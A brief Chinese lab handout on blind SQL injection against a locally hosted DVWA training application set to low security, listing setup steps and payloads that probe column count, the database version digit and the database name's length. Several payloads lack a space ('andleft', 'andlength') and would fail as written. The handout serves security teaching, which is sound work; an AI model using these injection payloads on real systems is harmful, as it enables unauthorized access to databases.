实验内容
1、安装好VMware软件并登入
2、进入界面,打开火狐浏览器,在地址输入localhost:81/dvwa/
3、在左栏选择DVWA Security,将等级选为low
4、检测漏洞是否存在。
5、探测当前表的字段数,使用语句1’ order by 2 #
1' andleft(version(),1)=1 and '1'='1
1' andleft(version(),1)=2 and '1'='1
1' andleft(version(),1)=3 and '1'='1
1' andleft(version(),1)=4 and '1'='1
1' andleft(version(),1)=5 and '1'='1
6、测试数据库长度
1' andlength(database())=1 and '1'='1
1' andlength(database())=2 and '1'='1
1' andlength(database())=3 and '1'='1
1' andlength(database())=4 and '1'='1